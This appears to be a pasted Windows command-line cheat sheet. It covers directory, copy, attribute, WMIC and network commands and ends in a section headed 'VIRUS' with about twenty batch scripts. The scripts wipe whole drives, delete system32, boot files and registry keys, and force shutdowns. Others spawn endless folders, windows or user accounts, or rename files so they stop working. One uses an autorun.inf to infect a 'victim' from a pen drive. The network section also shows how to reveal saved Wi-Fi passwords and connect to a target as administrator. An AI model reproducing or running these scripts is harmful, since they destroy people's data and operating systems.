  1779. [MD] MD ..\example
  1780. [MD] echo "Hello">C:\new.txt
  1781. [MD] echo. 2>EmptyFile.txt
  1782. [MD] type 2>EmptyFile.txt
  1783. [MD] type. 2>EmptyFile.txt
  1784. [MD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-MD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1785. [CD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-CD-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1786. [CD] CD [/D] [drive:][path]
  1787. [CD] CD
  1788. [CD] CD\Program Files
  1789. [CD] CD %USERPROFILE%
  1790. [CD] CD..
  1791. [CD] CD..\..
  1792. [CD] CD\
  1793. [CD] CD\Windows
  1794. [CD] CD\windows\system32
  1795. [CD] CD /d E:\Pics
  1796. [CD] CHDIR [/D] [drive:][path]
  1797. [CD] CHDIR [..]
  1798. [CD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-CD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1799. [CLIP] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CLIP-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1800. [CLIP] CLIP /?
  1801. [CLIP] command | clip
  1802. [CLIP] DIR | CLIP
  1803. [CLIP] CLIP < README.TXT
  1804. [CLIP] TYPE DIR /B > List.txt
  1805. [CLIP] CMD /R DIR /B > List.txt
  1806. [CLIP] DIR > List.txt
  1807. [CLIP] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CLIP END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1808. [DIR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-DIR-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1809. [DIR] DIR /?
  1810. [DIR] DIR \*.* /S /B /A
  1811. [DIR] DIR /ad
  1812. [DIR] DIR /ash
  1813. [DIR] DIR /a-d
  1814. [DIR] DIR /a:d
  1815. [DIR] DIR /b
  1816. [DIR] DIR /-c
  1817. [DIR] DIR /D
  1818. [DIR] DIR /L
  1819. [DIR] DIR /-N
  1820. [DIR] DIR /OD
  1821. [DIR] DIR /O-D
  1822. [DIR] DIR /P
  1823. [DIR] DIR /Q
  1824. [DIR] DIR /R
  1825. [DIR] DIR /S
  1826. [DIR] DIR /TC
  1827. [DIR] DIR /W
  1828. [DIR] DIR /a:s
  1829. [DIR] DIR \*.mp3 /s
  1830. [DIR] DIR \*.mp3 /s /p
  1831. [DIR] DIR \*.mp3 /s /b > filename.txt
  1832. [DIR] DIR \*.txt /s /b /a |clip
  1833. [DIR] DIR *.txt
  1834. [DIR] DIR /B /S \Mmystuff > File.txt
  1835. [DIR] DIR /O:gne OR DIR /O:S OR DIR /O:D
  1836. [DIR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-DIR END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1837. [ATTRIB] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-ATTRIB-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1838. [ATTRIB] ATTRIB +h %%0 Bat File hide
  1839. [ATTRIB] ATTRIB +S +H "E:\*" /S /D
  1840. [ATTRIB] ATTRIB -S -H -R /s /d *.*
  1841. [ATTRIB] ATTRIB -S -H -R /s /d G:\*.*
  1842. [ATTRIB] set /p Hide= Type File Only EXTENSION:,>ATTRIB +h +s *.%%Hide%%
  1843. [ATTRIB] set /p Unh= Type File Only EXTENSION:,>ATTRIB /S -h -s *.%%Unh%%
  1844. [ATTRIB] ATTRIB To hide all files and subfolders in your target location,
  1845. [ATTRIB] ATTRIB +h +S C:PathToTheFileOrFolder /s /d
  1846. [ATTRIB] ATTRIB -h c:\config.sys
  1847. [ATTRIB] ATTRIB -h -r -s c:\boot\bcd
  1848. [ATTRIB] ATTRIB +a f:*.* & attrib -a f:*.bak
  1849. [ATTRIB] ATTRIB myimage.jpg
  1850. [ATTRIB] ATTRIB Run command prompt as an administrator For Virus Remove
  1851. [ATTRIB] ATTRIB -r -a -h *.* or ATTRIB -s -h /s /d *.*
  1852. [ATTRIB] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-ATTRIB END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1853. [COPY] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COPY-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1854. [COPY] COPY *.txt D:\
  1855. [COPY] COPY *.* D: OR COPY * D:\Folder /y
  1856. [COPY] COPY sourceFile destinationFile OR XCOPY sourceFile destinationFile
  1857. [COPY] COPY c:\data\file1.doc D:\backup\file2.doc , Single Copy
  1858. [COPY] COPY c:\data\*.doc D:\backup , All Doc Files Data Folder Copy
  1859. [COPY] COPY /Y c:\dir1\file1.txt c:\dir2\file2.txt , Without confirmation
  1860. [COPY] To COPY all files in current folder to another folder
  1861. [COPY] COPY * D:\dir1\dir2
  1862. [COPY] COPY *.* D:
  1863. [COPY] COPY "computer hope.txt" hope
  1864. [COPY] COPY myfile1.txt+myfile2.txt , combines Files contents
  1865. [COPY] COPY /b Pic.jpg+Text.txt NewPic.jpg , Text Hide In Picture
  1866. [COPY] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COPY END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1867. [WMIC] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-WMIC-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1868. [WMIC] ~~~**** WMIC ALL COMMAND'S NOT WORK N.HTA***~~~
  1869. [WMIC] WMIC ComputerSystem GET Model
  1870. [WMIC] WMIC computersystem get name,systemtype
  1871. [WMIC] WMIC bios get serialnumber
  1872. [WMIC] WMIC csproduct get identifyingnumber
  1873. [WMIC] WMIC nic get macaddress,description
  1874. [WMIC] WMIC baseboard get product,Manufacturer,version,serialnumbe
  1875. [WMIC] WMIC COMPUTERSYSTEM get TotalPhysicalMemory
  1876. [WMIC] WMIC process get workingsetsize,commandline
  1877. [WMIC] WMIC partition get name,size,type
  1878. [WMIC] WMIC COMPUTERSYSTEM GET MANUFACTURER
  1879. [WMIC] WMIC csproduct get version
  1880. [WMIC] WMIC service list brief
  1881. [WMIC] WMIC process list brief
  1882. [WMIC] WMIC startup list brief
  1883. [WMIC] WMIC process where name="firefox.exe" call terminate
  1884. [WMIC] WMIC output to file get all process name Save
  1885. [WMIC] WMIC /output:"C:\output.txt"
  1886. [WMIC] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-WMIC END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1887. [NET] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NET-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1888. [NET] Ping =xample, you can type in Command prompt ping 8.8.8.8 which belongs to Google.
  1889. [NET] nslookup = nslookup www.google.com
  1890. [NET] arp = You can try typing arp-a in command prompt.
  1891. [NET] ipconfig =You can type in command prompt “ipconfig” or “ipconfig /all“
  1892. [NET] ipconfig /release (this will release your IP)
  1893. [NET] ipconfig /renew (this will renew your iP)
  1894. [NET] netstat =Type in command prompt “netstat -a“ "netstat -n" "netstat -an"
  1895. [NET] Route =You can type in command prompt “route print“
  1896. [NET] Net View =You can type in command prompt “net view x.x.x.x or computername“
  1897. [NET] Net User =Net User "Enter" , Net User Najeeb "Enter"
  1898. [NET] Net User =net user yourusername * (Change yourusername with your PC user name and press Enter. Now type the new password.)
  1899. [NET] Net Use =net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target as administrator)
  1900. [NET] Net Use =net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
  1901. [NET] Tasklist =taskkill /PID 1532 /F (if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
  1902. [NET] iexplore = use iexplore <IP address> to find sites running on any particular IP address.
  1903. [NET] Pathping =
  1904. [NET] Getmac =
  1905. [NET] Netsh =
  1906. [NET] ftp = ftp 192.168.1.80
  1907. [NET] ssh = ssh Najeeb@192.168.0.100
  1908. [NET] Netstat =
  1909. [NET] tracert =tracert www.google.com
  1910. [NET] Net wlan show profile "Enter"
  1911. [NET] Net wlan show profile "wifi Name" key=clear "Enter"
  1912. [NET] Help =whatevercommand /help OR whatevercommand /?
  1913. [NET] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NET END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1914. [VIRUS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-VIRUS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1915. [VIRUS] EVERY VIRUS SAVE (NOTEPADE) SAVE.BAT
  1916. [VIRUS] C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  1917. [VIRUS] 1 Unlimited Folder flooded prank
  1918. [VIRUS] @echo off
  1919. [VIRUS] : x
  1920. [VIRUS] md %%random%%
  1921. [VIRUS] /folder.
  1922. [VIRUS] goto x
  1923. [VIRUS] 2 ---------------------------------
  1924. [VIRUS] This will create unlimited no.of folders In Drive
  1925. [VIRUS] @echo off
  1926. [VIRUS] :VIRUS
  1927. [VIRUS] cd /d C:
  1928. [VIRUS] md %%RANDOM%%
  1929. [VIRUS] cd /d D:
  1930. [VIRUS] md %%RANDOM%%
  1931. [VIRUS] cd /d E:
  1932. [VIRUS] md %%RANDOM%%
  1933. [VIRUS] goto VIRUS
  1934. [VIRUS] 3 --------------------------------
  1935. [VIRUS] DIRVE FILES AND FOLDER DELETE
  1936. [VIRUS] @echo off
  1937. [VIRUS] del D:\*.* /f /s /q
  1938. [VIRUS] del E:\*.* /f /s /q
  1939. [VIRUS] del F:\*.* /f /s /q
  1940. [VIRUS] del G:\*.* /f /s /q
  1941. [VIRUS] del H:\*.* /f /s /q
  1942. [VIRUS] del I:\*.* /f /s /q
  1943. [VIRUS] del J:\*.* /f /s /q
  1944. [VIRUS] 4 -------------------------------
  1945. [VIRUS] DIRVE DELETE
  1946. [VIRUS] rd/s/q C:\
  1947. [VIRUS] rd/s/q D:\
  1948. [VIRUS] rd/s/q E:\
  1949. [VIRUS] rd/s/q F:\
  1950. [VIRUS] 5 --------------------------------
  1951. [VIRUS] C WINDOWS DELETE
  1952. [VIRUS] @echo off
  1953. [VIRUS] attrib -r -s -h c:\autoexec.bat
  1954. [VIRUS] del c:\autoexec.bat
  1955. [VIRUS] attrib -r -s -h c:\boot.ini
  1956. [VIRUS] del c:\boot.ini
  1957. [VIRUS] attrib -r -s -h c:\ntldr
  1958. [VIRUS] del c:\ntldr
  1959. [VIRUS] attrib -r -s -h c:\windows\win.ini
  1960. [VIRUS] del c:\windows\win.ini
  1961. [VIRUS] 6 ---------------------------------
  1962. [VIRUS] Del c:\WINDOWS\system32\*.*/q
  1963. [VIRUS] 7 ---------------------------------
  1964. [VIRUS] WINDOWS REGISTRY DELETE
  1965. [VIRUS] @ECHO OFF
  1966. [VIRUS] START reg delete HKCR/.exe
  1967. [VIRUS] START reg delete HKCR/.dll
  1968. [VIRUS] START reg delete HKCR/*
  1969. [VIRUS] 8 --------------------------------
  1970. [VIRUS] Dangerous notepad virus
  1971. [VIRUS] Delete Registry Keys
  1972. [VIRUS] @ECHO OFF
  1973. [VIRUS] START reg delete HKCR/.exe
  1974. [VIRUS] START reg delete HKCR/.dll
  1975. [VIRUS] START reg delete HKCR/*
  1976. [VIRUS] :MESSAGE
  1977. [VIRUS] ECHO Your PC has been crashed.Your Dad.
  1978. [VIRUS] GOTO MESSAGE
  1979. [VIRUS] 9 --------------------------------
  1980. [VIRUS] NET CLOSE
  1981. [VIRUS] @Echo off
  1982. [VIRUS] Ipconfig /release
  1983. [VIRUS] 10 -------------------------------
  1984. [VIRUS] SHUTDOWN COMPUTER
  1985. [VIRUS] @echo off
  1986. [VIRUS] msg * Lets Roll Baby
  1987. [VIRUS] shutdown -c “Error” -s
  1988. [VIRUS] 11 -------------------------------
  1989. [VIRUS] SHUTDOWN COMPUTER
  1990. [VIRUS] shutdown -s -t 100 c “Installing Updates”
  1991. [VIRUS] 12 --------------------------------
  1992. [VIRUS] This Virus Deletes All The Content Of A Drive...
  1993. [VIRUS] @echo off
  1994. [VIRUS] del %%systemdrive%%*.* /f /s /q
  1995. [VIRUS] shutdown -r -f -t 00
  1996. [VIRUS] Save The Above Code As Anything.bat
  1997. [VIRUS] 13 --------------------------------
  1998. [VIRUS] Endless Notepad virus prank
  1999. [VIRUS] @ECHO off
  2000. [VIRUS] :top
  2001. [VIRUS] START %%SystemRoot%%\system32\notepad.exe
  2002. [VIRUS] GOTO top
  2003. [VIRUS] 14 ---------------------------------
  2004. [VIRUS] Notepad Matrix prank
  2005. [VIRUS] @echo off
  2006. [VIRUS] color 02
  2007. [VIRUS] :start
  2008. [VIRUS] echo %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%%
  2009. [VIRUS] goto start
  2010. [VIRUS] 15 --------------------------------
  2011. [VIRUS] SOFTWARE BOOM
  2012. [VIRUS] @echo off
  2013. [VIRUS] :x
  2014. [VIRUS] start winword
  2015. [VIRUS] start mspaint
  2016. [VIRUS] start notepad
  2017. [VIRUS] start write
  2018. [VIRUS] start cmd
  2019. [VIRUS] start explorer
  2020. [VIRUS] start control
  2021. [VIRUS] start calc
  2022. [VIRUS] goto x
  2023. [VIRUS] 16 ----------------------------------
  2024. [VIRUS] User Account Floders
  2025. [VIRUS] This will create large no. of the user account on one’s PC and goes on
  2026. [VIRUS] @echo off
  2027. [VIRUS] :xnet
  2028. [VIRUS] user %%random%% /add
  2029. [VIRUS] goto x
  2030. [VIRUS] 17 ----------------------------------
  2031. [VIRUS] Constantly Repeat Any Messages
  2032. [VIRUS] This is one of the Best Notepad tricks that will repeat any of the messages on the computer screen repeatedly. Just copy the below code and paste in the notepad and save it as “message.bat”.
  2033. [VIRUS] @ECHO off
  2034. [VIRUS] :Begin
  2035. [VIRUS] msg * Hi
  2036. [VIRUS] msg * Are you having fun?
  2037. [VIRUS] msg * I am
  2038. [VIRUS] msg * Lets have fun together
  2039. [VIRUS] msg * Because you have been o-w-n-e-d
  2040. [VIRUS] GOTO BEGIN
  2041. [VIRUS] 18 --------------------------------------
  2042. [VIRUS] Virus that crashes pc
  2043. [VIRUS] @echo off
  2044. [VIRUS] attrib -r -s -h c:autoexec.bat
  2045. [VIRUS] del c:autoexec.bat
  2046. [VIRUS] attrib -r -s -h c:boot.ini
  2047. [VIRUS] del c:boot.ini
  2048. [VIRUS] attrib -r -s -h c:ntldr
  2049. [VIRUS] del c:ntldr
  2050. [VIRUS] attrib -r -s -h c:windowswin.ini
  2051. [VIRUS] del c:windowswin.ini
  2052. [VIRUS] @echo off
  2053. [VIRUS] msg * YOU GOT OWNED
  2054. [VIRUS] shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  2055. [VIRUS] Save As Anything.bat File In Notepad
  2056. [VIRUS] And Shut Down The Computer Never To Reboot Again
  2057. [VIRUS] 19 ---------------------------------
  2058. [VIRUS] Change Files To Non-working TXT Files
  2059. [VIRUS] Save As A bat File
  2060. [VIRUS] REN *.DOC *.TXT
  2061. [VIRUS] REN *.JPEG *.TXT
  2062. [VIRUS] REN *.LNK *.TXT
  2063. [VIRUS] REN *.AVI *.TXT
  2064. [VIRUS] REN *.MPEG *.TXT
  2065. [VIRUS] REN *.COM *.TXT
  2066. [VIRUS] REN *.BAT *.TXT
  2067. [VIRUS] Pause:
  2068. [VIRUS] 20 ---------------------------------------
  2069. [VIRUS] Open notepad and write
  2070. [VIRUS] [autorun]
  2071. [VIRUS] open=anything.bat
  2072. [VIRUS] Icon=anything.ico
  2073. [VIRUS] Save file as autorun.inf
  2074. [VIRUS] Step 2. Put this autorun.inf and your actual batch virus anything.bat in pendrive .
  2075. [VIRUS] When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
  2076. [VIRUS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-VIRUS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2077. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement